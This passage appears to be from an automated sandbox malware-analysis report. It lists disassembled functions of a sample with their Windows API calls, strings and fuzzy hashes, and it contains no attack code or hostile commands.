        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
        • String ID:
        • API String ID: 1353541977-0
        • Opcode ID: 722dc2d474ff6bed272bc629d003e972c0fd5e02193a142f58cfd976a93d80b9
        • Instruction ID: a1af4c8a86482a4cb5835ef1a54cad6e319f3f55c03330c3368104a186430cd9
        • Opcode Fuzzy Hash: 722dc2d474ff6bed272bc629d003e972c0fd5e02193a142f58cfd976a93d80b9
        • Instruction Fuzzy Hash: 94411AB1A00315EBC711DF65DC45BAEBBA9EB4C710F10422AF605E72A0D775A8848BE4
        Function 0013E8CF Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184COMMON
        Download Yara Rule
        APIs
        • _wcslen.LIBCMT ref: 0013E8EE
        • ShowWindow.USER32(?,00000000), ref: 0013EA5D
        • GetExitCodeProcess.KERNEL32(?,?), ref: 0013EA99
        • CloseHandle.KERNEL32(?), ref: 0013EABF
        • ShowWindow.USER32(?,00000001), ref: 0013EB21
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ShowWindow$CloseCodeExitHandleProcess_wcslen
        • String ID: .exe$.inf
        • API String ID: 783751319-3750412487
        • Opcode ID: 8d81a464152269ac5b0da4701d3c551484a6296cb76e1ab078abb0df2d2c3d18
        • Instruction ID: 3fdac1150d0ef0c66ca798209d2612e73016dc59474c42175786ba8366afbc88
        • Opcode Fuzzy Hash: 8d81a464152269ac5b0da4701d3c551484a6296cb76e1ab078abb0df2d2c3d18
        • Instruction Fuzzy Hash: A951F231148380AAEB319F20D844BBBBBE9EF84748F04481DF5C5972E4EB718989CB52
        Function 0012A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0012A5EE
        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0012A611
        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0012A630
          • Part of subcall function 0012D6A7: _wcslen.LIBCMT ref: 0012D6AF
          • Part of subcall function 00133306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0012D523,00000000,.exe,?,?,00000800,?,?,?,00139E4C), ref: 0013331C
        • _swprintf.LIBCMT ref: 0012A6CC
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • MoveFileW.KERNEL32(?,?), ref: 0012A73B
        • MoveFileW.KERNEL32(?,?), ref: 0012A77B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
        • String ID: rtmp%d
        • API String ID: 3726343395-3303766350
        • Opcode ID: 2302ff4036a0cca206399062ccdc8411cbfd770dc1f2d7a074060d6e88500bf9
        • Instruction ID: d05571918295dd1e528f052084537f3efa8b00374737f7fb93ac57f41a8e0026
        • Opcode Fuzzy Hash: 2302ff4036a0cca206399062ccdc8411cbfd770dc1f2d7a074060d6e88500bf9
        • Instruction Fuzzy Hash: F7417C71900279ABCF20ABA0EC94EEF737CBF64345F4404A5B546E3046EB358A95CF65
        Function 00132528 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
        Download Yara Rule
        APIs
        • __aulldiv.LIBCMT ref: 0013253E
          • Part of subcall function 0012C619: GetVersionExW.KERNEL32(?), ref: 0012C63E
        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00132561
        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00132573
        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00132584
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00132594
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001325A4
        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001325DF
        • __aullrem.LIBCMT ref: 00132689
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
        • String ID:
        • API String ID: 1247370737-0
        • Opcode ID: dd3318d55d85d422435d4f0843a5dac8dd876c74f709da27226abef3c3e2133a
        • Instruction ID: 098b5b7ae84b588a2ce8970f46202bd60d5bbba9dea3920064f7329d6fbe7217
        • Opcode Fuzzy Hash: dd3318d55d85d422435d4f0843a5dac8dd876c74f709da27226abef3c3e2133a
        • Instruction Fuzzy Hash: B44117B1508305AFC710DF65D88096BBBF9FF98315F00892EF99AC6210E735E589CB62
        Function 0013AD0E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: </p>$</style>$<br>$<style>$>
        • API String ID: 176396367-3568243669
        • Opcode ID: 323d75141b7e5f7f26c0597762166bf0ac7cf40eaf3385785afb2e52138ba01c
        • Instruction ID: 9d15c1a338e3c976b4598b9ff03d3c4c3a1f6a9d1d25ba7d9ade33c492f8750c
        • Opcode Fuzzy Hash: 323d75141b7e5f7f26c0597762166bf0ac7cf40eaf3385785afb2e52138ba01c
        • Instruction Fuzzy Hash: CF51296674032395DB305A98982177673E5EF64752FE8442BFDC1CF5C0FB658D8182A3
        Function 0015083D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
        Download Yara Rule
        APIs
        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00150FB2,00000000,00000000,00000000,00000000,00000000,?), ref: 0015087F
        • __fassign.LIBCMT ref: 001508FA
        • __fassign.LIBCMT ref: 00150915
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0015093B
        • WriteFile.KERNEL32(?,00000000,00000000,00150FB2,00000000,?,?,?,?,?,?,?,?,?,00150FB2,00000000), ref: 0015095A
        • WriteFile.KERNEL32(?,00000000,00000001,00150FB2,00000000,?,?,?,?,?,?,?,?,?,00150FB2,00000000), ref: 00150993
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID:
        • API String ID: 1324828854-0
        • Opcode ID: 125762f146a3e267576352b29a68be769da250238b49b41d673a3fa8fa061eb7
        • Instruction ID: c89fca0ab3621c611872d42362e4d2a2cd4cd09a53da73cd27c172c4abafad79
        • Opcode Fuzzy Hash: 125762f146a3e267576352b29a68be769da250238b49b41d673a3fa8fa061eb7
        • Instruction Fuzzy Hash: 3B5182B1A00249DFDB11CFE8D885AEEBBB4EF4D315F14411AE965EB252E7309984CB60
        Function 00143A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
        Download Yara Rule
        APIs
        • _ValidateLocalCookies.LIBCMT ref: 00143AB7
        • ___except_validate_context_record.LIBVCRUNTIME ref: 00143ABF
        • _ValidateLocalCookies.LIBCMT ref: 00143B48
        • __IsNonwritableInCurrentImage.LIBCMT ref: 00143B73
        • _ValidateLocalCookies.LIBCMT ref: 00143BC8
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
        • String ID: csm
        • API String ID: 1170836740-1018135373
        • Opcode ID: 282b95c91e68768744234bca6b8e354afe9e0e293525f49388114f3b66e23bd5
        • Instruction ID: b02d18efc83430f3c98c44fdf58882dd155b66200e00005984110611dfac7651
        • Opcode Fuzzy Hash: 282b95c91e68768744234bca6b8e354afe9e0e293525f49388114f3b66e23bd5
        • Instruction Fuzzy Hash: 2041A234A00218DFCF10DF69C885B9EBBB5EF55328F148165E8249B3A2D731AB55CB90
        Function 0013A965 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen
        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
        • API String ID: 176396367-3743748572
        • Opcode ID: 70800871b63892d11a760962c7ecda2d590a6499f08bad9989f492989e77b0a5
        • Instruction ID: ce861711c4a7cc1af3ea91040a24524753130846209aa28e63a1f4c3d54d8fa9
        • Opcode Fuzzy Hash: 70800871b63892d11a760962c7ecda2d590a6499f08bad9989f492989e77b0a5
        • Instruction Fuzzy Hash: AA314D23644301A6D734AB549C42B7A73E4EF60760FE0842FF9D56B2D1FB64AC44C3A2
        Function 0014DA54 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
        Download Yara Rule
        APIs
          • Part of subcall function 0014DA18: _free.LIBCMT ref: 0014DA41
        • _free.LIBCMT ref: 0014DAA2
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014DAAD
        • _free.LIBCMT ref: 0014DAB8
        • _free.LIBCMT ref: 0014DB0C
        • _free.LIBCMT ref: 0014DB17
        • _free.LIBCMT ref: 0014DB22
        • _free.LIBCMT ref: 0014DB2D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
        • Instruction ID: acefab7dc6defc40b96595dd9b589b33508e9d3785c41f3b181e5e7878ff5d05
        • Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
        • Instruction Fuzzy Hash: 41114C71985B04BADA20BBB0EC0BFCB779CAF30740F854C15B29AB7072DB65B5058792
        Function 0013F76A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0013F7E5,0013F748,0013F9E9), ref: 0013F781
        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0013F797
        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0013F7AC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
        • API String ID: 667068680-1718035505
        • Opcode ID: a2fbf01380595e548f957efb5db634d5f745e484e909a015938aebbc751443f3
        • Instruction ID: c52678043a5182fb2915eedac14b8d35714aaa8f7789e2d70b21afa04d8200dc
        • Opcode Fuzzy Hash: a2fbf01380595e548f957efb5db634d5f745e484e909a015938aebbc751443f3
        • Instruction Fuzzy Hash: C2F02233B01222DBCB204EA44C859AA72889B01752BA5053DFA20D7A80E320CDC757D0
        Function 00132789 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
        Download Yara Rule
        APIs
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 001327E1
          • Part of subcall function 0012C619: GetVersionExW.KERNEL32(?), ref: 0012C63E
        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00132805
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0013281F
        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00132832
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00132842
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00132852
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time$File$System$Local$SpecificVersion
        • String ID:
        • API String ID: 2092733347-0
        • Opcode ID: 6f93ba9a74c35fda22fab8ef6a25e050790066fa7a64f42ea9f6f6cd67c14d86
        • Instruction ID: 98a4b45c1044fa6feb2fe3e4b2b6650d6f5637be5ae31825e0fea6b8bc02851f
        • Opcode Fuzzy Hash: 6f93ba9a74c35fda22fab8ef6a25e050790066fa7a64f42ea9f6f6cd67c14d86
        • Instruction Fuzzy Hash: DB31EA75108355ABC704DFA8D88499BB7F8BF98714F00591EF999C3610E730E585CBA6
        Function 00143C7A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetLastError.KERNEL32(?,?,00143C71,00143A2C,00140BE4), ref: 00143C88
        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00143C96
        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00143CAF
        • SetLastError.KERNEL32(00000000,00143C71,00143A2C,00140BE4), ref: 00143D01
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLastValue___vcrt_
        • String ID:
        • API String ID: 3852720340-0
        • Opcode ID: 353ca0d0bd8cdf92780d8c14c11323e6c3a34d7654ac83753a2f010b935debf3
        • Instruction ID: 79dd2a20b935a878f4fe5e8c996bc17573c854cbdc35a7180f3e4605761e5886
        • Opcode Fuzzy Hash: 353ca0d0bd8cdf92780d8c14c11323e6c3a34d7654ac83753a2f010b935debf3
        • Instruction Fuzzy Hash: A201F7336093216FB71927B87CC6B6B3A58EB15B79B70032AF630B64F0EF915D405580
        Function 0014A505 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • GetLastError.KERNEL32(?,00163070,00145972,00163070,?,?,00145271,00000050,?,00163070,00000200), ref: 0014A509
        • _free.LIBCMT ref: 0014A53C
        • _free.LIBCMT ref: 0014A564
        • SetLastError.KERNEL32(00000000,?,00163070,00000200), ref: 0014A571
        • SetLastError.KERNEL32(00000000,?,00163070,00000200), ref: 0014A57D
        • _abort.LIBCMT ref: 0014A583
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorLast$_free$_abort
        • String ID:
        • API String ID: 3160817290-0
        • Opcode ID: 5de12eb2dc176ee40b64ce472c7c35a6025bb63a1d764d58dfcf647c3f76d121
        • Instruction ID: 22cf0d86415112470d7ccc9d2af14b94fa54426fbc81036eb484ec932bd9e6ae
        • Opcode Fuzzy Hash: 5de12eb2dc176ee40b64ce472c7c35a6025bb63a1d764d58dfcf647c3f76d121
        • Instruction Fuzzy Hash: AAF0283A1C0600A7C20633787E0AB6B2D659FE1731FB70018F618EA1B2FF718D819957
        Function 0013ED7B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
        Download Yara Rule
        APIs
        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0013ED87
        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0013EDA1
        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0013EDB2
        • TranslateMessage.USER32(?), ref: 0013EDBC
        • DispatchMessageW.USER32(?), ref: 0013EDC6
        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0013EDD1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
        • String ID:
        • API String ID: 2148572870-0
        • Opcode ID: abcd87a92b731c688dccc091e077d2bf122d474fc5e88beb3104cab4ce1bffc5
        • Instruction ID: 33b3ad87dc816b00f79c366c60d3f6e8faccc897df433f87cd659a519b1a7442
        • Opcode Fuzzy Hash: abcd87a92b731c688dccc091e077d2bf122d474fc5e88beb3104cab4ce1bffc5
        • Instruction Fuzzy Hash: 6BF03772A01219ABCB206BA1EC4CDCF7FAEEF42791F108021B60BD6490D6348695CBE0
        Function 0012D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00131900: _wcslen.LIBCMT ref: 00131906
          • Part of subcall function 0012CD5C: _wcsrchr.LIBVCRUNTIME ref: 0012CD73
        • _wcslen.LIBCMT ref: 0012D5A4
        • _wcslen.LIBCMT ref: 0012D5EC
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
